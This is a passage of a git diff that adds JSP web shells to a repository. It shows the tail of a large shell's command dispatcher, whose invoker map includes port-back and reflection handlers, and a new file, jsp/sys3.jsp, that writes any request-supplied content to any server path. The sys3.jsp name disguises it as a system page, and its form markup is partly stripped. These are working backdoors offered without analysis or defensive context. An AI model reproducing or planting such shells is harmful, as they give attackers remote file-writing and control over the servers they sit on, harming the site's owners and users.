EvalInvoker()); +ins.put("eu",new EvalUploadInvoker()); +ins.put("vother",new VOtherInvoker()); +ins.put("sm",new SmInvoker()); +ins.put("vExport",new VExport2FileInvoker()); +ins.put("vPack",new VPackConfigInvoker()); +ins.put("reflect",new ReflectInvoker()); +ins.put("portBack",new PortBackInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (Util.isEmpty(o)) { +if (session.getAttribute(SESSION_O) == null) +o = "index"; +else { +o = session.getAttribute(SESSION_O).toString(); +session.removeAttribute(SESSION_O); +} +} +Object obj = ins.get(o); +if (obj == null) { +response.sendRedirect(SHELL_NAME); +} else { + Invoker in = (Invoker)obj; +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null) +session.setAttribute(CURRENT_DIR,path); +((Invoker)ins.get("before")).invoke(request,response,session); +((Invoker)ins.get("script")).invoke(request,response,session); +((Invoker)ins.get("top")).invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +((Invoker)ins.get("bottom")).invoke(request,response,session); +((Invoker)ins.get("after")).invoke(request,response,session); +} +} +} catch (Exception e) { +Object msg = session.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +session.removeAttribute(MSG); +} +if (e.toString().indexOf("ClassCastException") != -1) { +Util.outMsg(out,MODIFIED_ERROR + BACK_HREF); +} +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","
"),"left"); +bout.close(); +out.flush(); +((Invoker)ins.get("bottom")).invoke(request,response,session); +((Invoker)ins.get("after")).invoke(request,response,session); +} +%> diff --git a/jsp/sys3.jsp b/jsp/sys3.jsp new file mode 100644 index 0000000..45058bf --- /dev/null +++ b/jsp/sys3.jsp @@ -0,0 +1,43 @@ +<%@page contentType="text/html;charset=gb2312"%> +<%@page import="java.io.*,java.util.*,java.net.*"%> + + + + + + <% + if(request.getParameter("context")!=null) + { + String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312"); + String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312"); + OutputStream pt = null; + try { + pt = new FileOutputStream(path); + pt.write(context.getBytes()); + out.println("ok"); + } catch (FileNotFoundException ex2) { + out.println("shib"); + } catch (IOException ex) { + out.println("ok"); + } finally { + try { + pt.close(); + } catch (IOException ex3) { + out.println("shib"); + } + } +} + %> +
+
+
+ "> +
+
+ +
+
+ +
+ + \ No newline at end of file